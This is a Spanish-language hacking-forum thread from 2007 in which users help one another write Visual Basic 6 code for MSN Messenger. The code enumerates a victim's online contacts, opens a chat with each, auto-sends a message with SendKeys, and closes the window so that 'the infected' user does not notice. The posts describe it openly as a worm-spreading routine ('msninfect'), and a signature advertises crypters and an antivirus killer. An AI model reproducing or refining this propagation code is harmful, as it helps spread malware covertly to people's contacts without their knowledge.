elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Copiar lista de contactos msn
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Copiar lista de contactos msn  (Leído 9,880 veces)
krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Copiar lista de contactos msn
« en: 19 Septiembre 2007, 22:07 pm »

Buenas
Mi problema es que me tira error 91 al ejecutar esto:

Código:
Option Explicit
Public WithEvents MSN As MessengerAPI.Messenger
 Public WithEvents MsgrUIA As MessengerAPI.Messenger
 
Private Sub Form_Load()
Set MSN = New MessengerAPI.Messenger
Dim user As IMessengerContact
For Each user In MsgrUIA.MyContacts 'Por cada usuario en la lista de contactos: si está conectado, en linea, ausente, no disponible, etcetera. agrega cada direccion de correo a List1
If user.Status = MISTATUS_ONLINE Or user.Status = MISTATUS_AWAY Or user.Status = MISTATUS_BE_RIGHT_BACK Or user.Status = MISTATUS_BUSY Or user.Status = MISTATUS_IDLE Or user.Status = MISTATUS_ON_THE_PHONE Or user.Status = MISTATUS_OUT_TO_LUNCH Then
List1.AddItem user.SigninName 'También podríamos hacer esto con el nick colocando "user.FriendlyName"
End If
Next
End Sub


Nose cual es el error :S parece estar todo bien.

Aver si alguien sabe

Salu2


En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Copiar lista de contactos msn
« Respuesta #1 en: 19 Septiembre 2007, 22:34 pm »

Tienes que leer los errores y mirar la linea...como pongas un post por cada error pufff...yo al menos saturaría el foro.

Error 91, Variable de tipo Object o la variable del bloque With no está establecida

Despues de eso miras la linea y ves como estás usando una variable definido que no estableciste con SET...te faltaba Set MsgrUIA = New MessengerAPI.Messenger

El código te queda así:

Código
  1. Option Explicit
  2. Public WithEvents MSN As MessengerAPI.Messenger
  3. Public WithEvents MsgrUIA As MessengerAPI.Messenger
  4.  
  5. Private Sub Form_Load()
  6. Set MSN = New MessengerAPI.Messenger
  7. Set MsgrUIA = New MessengerAPI.Messenger
  8. Dim user As IMessengerContact
  9. For Each user In MsgrUIA.MyContacts 'Por cada usuario en la lista de contactos: si está conectado, en linea, ausente, no disponible, etcetera. agrega cada direccion de correo a List1
  10. If user.Status = MISTATUS_ONLINE Or user.Status = MISTATUS_AWAY Or user.Status = MISTATUS_BE_RIGHT_BACK Or user.Status = MISTATUS_BUSY Or user.Status = MISTATUS_IDLE Or user.Status = MISTATUS_ON_THE_PHONE Or user.Status = MISTATUS_OUT_TO_LUNCH Then
  11. List1.AddItem user.SigninName 'También podríamos hacer esto con el nick colocando "user.FriendlyName"
  12. End If
  13. Next
  14. End Sub
  15.  

Saludos ;)


En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Copiar lista de contactos msn
« Respuesta #2 en: 20 Septiembre 2007, 03:21 am »

Te agradezco, ya va perfecto.
Si lo que pasa es que no ponia la linea del error :S
Solo decia
Citar
Error 91, Variable de tipo Object o la variable del bloque With no está establecida

Bien ahora yo quisiera que mande un mensaje a uno por uno de esa lista, lo que probe hacer es esto, pero no va :S

Código:
Option Explicit
Public WithEvents MSN As MessengerAPI.Messenger
 Public WithEvents MsgrUIA As MessengerAPI.Messenger
 
Private Sub Form_Load()
Set MSN = New MessengerAPI.Messenger
Set MsgrUIA = New MessengerAPI.Messenger
Dim user As IMessengerContact
For Each user In MsgrUIA.MyContacts
If user.Status = MISTATUS_ONLINE Or user.Status = MISTATUS_AWAY Or user.Status = MISTATUS_BE_RIGHT_BACK Or user.Status = MISTATUS_BUSY Or user.Status = MISTATUS_IDLE Or user.Status = MISTATUS_ON_THE_PHONE Or user.Status = MISTATUS_OUT_TO_LUNCH Then
List1.AddItem user.SigninName
End If
MSN.InstantMessage List1
SendKeys (" prueba ")
SendKeys ("{ENTER}")
Next
End Sub

Aver alguien que sepa de Vb que me dice.

Salu2 y muchas gracias
En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Copiar lista de contactos msn
« Respuesta #3 en: 20 Septiembre 2007, 15:14 pm »

Pregunta hasta el punto de agregarlos a la lista, funciona???
por q tal vez te este fallando y no se produzca el envio uno por uno ....yo ahora no puedo probarlo por q toy en el trabajo y no tengo vb a mano y sino cheka esto y ve al "sub msninfect"

http://foro.elhacker.net/index.php?topic=181032.msg862609

ta l vez puedas comparar

PD: Yo no se de visual basic
« Última modificación: 20 Septiembre 2007, 15:18 pm por Tengu ..::Fireb0y::.. » En línea


Encuentros por Video y Chat !!
krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Copiar lista de contactos msn
« Respuesta #4 en: 21 Septiembre 2007, 00:40 am »

Si, lo vi, lo que passa es que si pongo dos veces el "for each" no me deja :S
Asi que no puedo poner esto
Código:
For Each ConTacto In w.MyContacts 'Vamos de contacto en contacto
Ya que ya lo tengo en:
Código:
For Each user In MsgrUIA.MyContacts

Salu2
En línea

krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Copiar lista de contactos msn
« Respuesta #5 en: 21 Septiembre 2007, 02:19 am »

Ya pude hacerlo :
Public WithEvents MSN As MessengerAPI.Messenger
 Public WithEvents MsgrUIA As MessengerAPI.Messenger


Citar
Private Sub Form_Load()
msninfect:
Set MSN = New MessengerAPI.Messenger
Set MsgrUIA = New MessengerAPI.Messenger
Dim user As IMessengerContact
Dim ConTacto As IMessengerContact
For Each ConTacto In MsgrUIA.MyContacts
If (ConTacto.Status = 2) Or (ConTacto.Status = 10) Or (ConTacto.Status = 14) Or (ConTacto.Status = 34) Or (ConTacto.Status = 50) Or (ConTacto.Status = 66) Then
MSN.InstantMessage (user.SigninName)
SendKeys (" prueba ")
SendKeys ("{ENTER}")
End If
Next
End Sub

Pequeño problema ahora,
Primero: Solo alcanza a mandar el mensaje a unos pocos ya que carga demasiado rapido las ventanas.
Segundo: Abre demasiado rapido las ventanas por lo que coinsume mucha cpu.
Tercero: No se cierran las ventanas por lo que el infectado ve el mensaje

Ahora como se podria hacer par que entre ventana y ventana al abrir pasen 5 segundos, y la ventana una ves mendada el mensaje se cierre ?

Aver si alguien sabe.

Salu2
En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Copiar lista de contactos msn
« Respuesta #6 en: 21 Septiembre 2007, 02:46 am »

busca algo sobre la funcion "sleep" y para cerrar solo dale  un sendkeys con % y F4 y listo..

En línea


Encuentros por Video y Chat !!
Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Copiar lista de contactos msn
« Respuesta #7 en: 21 Septiembre 2007, 02:58 am »

o....


Código:
Private Sub Wait(ByVal nSec As Integer)
Dim t1 As Date, t2 As Date

t1 = Second(Now)
t2 = t1 + nSec

Do
DoEvents
Loop While t2 > Second(Now)
End Sub

y cuando quieras esperar pones este code

Código:
Wait (1)


Sacado del code q esta en el hilo q antes postee
En línea


Encuentros por Video y Chat !!
krosty_ufc

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Copiar lista de contactos msn
« Respuesta #8 en: 21 Septiembre 2007, 04:04 am »

Bien si conoscia lo de la funcion sleep, pero era que no me di cuenta que podia usarla aca xDDD
Y sobre lo de alt f4, no sabia como ponerlo jaja
Y sobre el de "wait (1)" no lo usaba porq solo era 1 seg xD pero agrege 5 d esos n ose me abai ocurrido jajaja.
Bien lo que hize fue lo siguiente:



Código:
Option Explicit
Public WithEvents MSN As MessengerAPI.Messenger
 Public WithEvents MsgrUIA As MessengerAPI.Messenger

Private Sub Wait(ByVal nSec As Integer)
Dim t1 As Date, t2 As Date

t1 = Second(Now)
t2 = t1 + nSec

Do
DoEvents
Loop While t2 > Second(Now)
End Sub
Private Sub Form_Load()
Set MSN = New MessengerAPI.Messenger
Set MsgrUIA = New MessengerAPI.Messenger
Dim user As IMessengerContact
Dim ConTacto As IMessengerContact
For Each user In MsgrUIA.MyContacts
If (user.Status = 2) Or (user.Status = 10) Or (user.Status = 14) Or (user.Status = 34) Or (user.Status = 50) Or (user.Status = 66) Then
MSN.InstantMessage (user.SigninName)
SendKeys ("prueba")
SendKeys ("{ENTER}")
Wait (1)
Wait (1)
Wait (1)
Wait (1)
Wait (1)
SendKeys ("%{F4}")

End If
Next
End Sub

Anda de lujo esepto por el alt + f4 que en mi maquina aprece no andar, porq me tira a la ventana de cerrar win, nose porque.
Pruebenlo algien dsd su pc aver si le funciona bien y comenta aver que tal plis.

Salu2 y muchas gracais por la ayuda
En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: Copiar lista de contactos msn
« Respuesta #9 en: 21 Septiembre 2007, 04:40 am »

antes del sendkeys alt+f4 puedes probar poniendo esto:

Código:
appactivate "Conversación"
En línea


Encuentros por Video y Chat !!
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿En cuántas personas de tu lista de contactos de Facebook confías?
Noticias
wolfbcn 3 2,242 Último mensaje 24 Enero 2012, 23:12 pm
por Constance
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines